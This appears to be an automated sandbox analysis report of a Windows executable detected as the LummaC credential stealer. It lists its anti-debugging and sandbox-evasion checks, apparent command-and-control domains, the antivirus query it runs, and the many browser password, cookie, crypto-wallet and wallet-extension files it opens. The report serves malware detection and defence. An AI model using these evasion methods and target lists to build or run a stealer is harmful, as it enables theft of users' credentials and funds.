Jm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0VhpWbZdIcVFHnb3QBFJEgxwyQpCTte0yQjzn7uCUZsuA+iYIJO4a+Hmq+9ONtmOcMMYl7TbktlwpTMf366yxqm+uPbWY4CHOTnr
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: TTsfmr1RWm.exe, 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: NTICE
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: SICE
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Code function: 0_2_0096E110 LdrInitializeThunk,

0_2_0096E110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: TTsfmr1RWm.exe	String found in binary or memory: hummskitnj.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: appliacnesot.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: cashfuzysao.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: inherineau.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: screwamusresz.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: rebuildeso.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: scentniej.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: mindhandru.buzz
Source: TTsfmr1RWm.exe	String found in binary or memory: prisonyfork.buzz

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: TTsfmr1RWm.exe, 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o pn}Program Manager
Source: TTsfmr1RWm.exe, TTsfmr1RWm.exe, 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: pn}Program Manager

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: TTsfmr1RWm.exe, 00000000.00000003.2397966187.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397727270.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2415415649.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2475289845.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2548606886.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2401458196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2562807391.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: TTsfmr1RWm.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: TTsfmr1RWm.exe	String found in binary or memory: Jaxx Liberty
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: TTsfmr1RWm.exe	String found in binary or memory: ExodusWeb3
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: TTsfmr1RWm.exe, 00000000.00000003.2375404477.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: TTsfmr1RWm.exe, 00000000.00000003.2375404477.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
